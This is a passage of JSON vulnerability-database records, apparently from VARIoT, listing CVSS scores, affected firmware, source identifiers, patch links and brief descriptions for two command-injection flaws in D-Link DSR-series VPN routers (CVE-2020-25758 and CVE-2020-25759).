          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2020-25758",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2020-72722",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-25758",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-25758",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-72722",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-1106",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root. D-Link DSR-250 A device contains a vulnerability related to inadequate data integrity verification.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering. \n\r\n\r\nD-Link DSR-250 3.17 has a command injection vulnerability. The vulnerability stems from insufficient verification of the configuration file checksum",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25758",
        "trust": 3.0
      },
      {
        "db": "DLINK",
        "id": "SAP10195",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ]
  },
  "id": "VAR-202012-0332",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:16:41.834000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "title": "Patch for D-Link DSR-250 command injection vulnerability (CNVD-2020-72722)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/242236"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-354",
        "trust": 1.0
      },
      {
        "problemtype": "Insufficient data integrity verification (CWE-354) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25758"
      },
      {
        "trust": 1.6,
        "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
      },
      {
        "trust": 1.6,
        "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
      },
      {
        "trust": 1.6,
        "url": "https://www.dlink.com/en/security-bulletin"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "date": "2021-08-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "date": "2020-12-15T20:15:16.243000",
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "date": "2020-12-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "date": "2021-08-27T07:49:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "date": "2021-04-23T18:24:57.783000",
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "date": "2020-12-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DSR-250\u00a0 Vulnerability related to inadequate data integrity verification on devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ],
    "trust": 0.6
  }
}

VAR-202012-0333

Vulnerability from variot - Updated: 2023-12-18 12:16

An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests. D-Link DSR-250 The device is vulnerable to input verification, and OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering.

D-Link DSR-250 3.17 has a command injection vulnerability in the Unified Services Router web interface. Attackers can use this vulnerability to execute arbitrary commands

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0333",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-1000ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "*"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "3.17"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "cve": "CVE-2020-25759",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2020-25759",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2020-72723",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-25759",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-25759",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-72723",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-1105",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests. D-Link DSR-250 The device is vulnerable to input verification, and OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering. \n\r\n\r\nD-Link DSR-250 3.17 has a command injection vulnerability in the Unified Services Router web interface. Attackers can use this vulnerability to execute arbitrary commands",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25759",
        "trust": 3.0
      },
      {
        "db": "DLINK",
        "id": "SAP10195",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
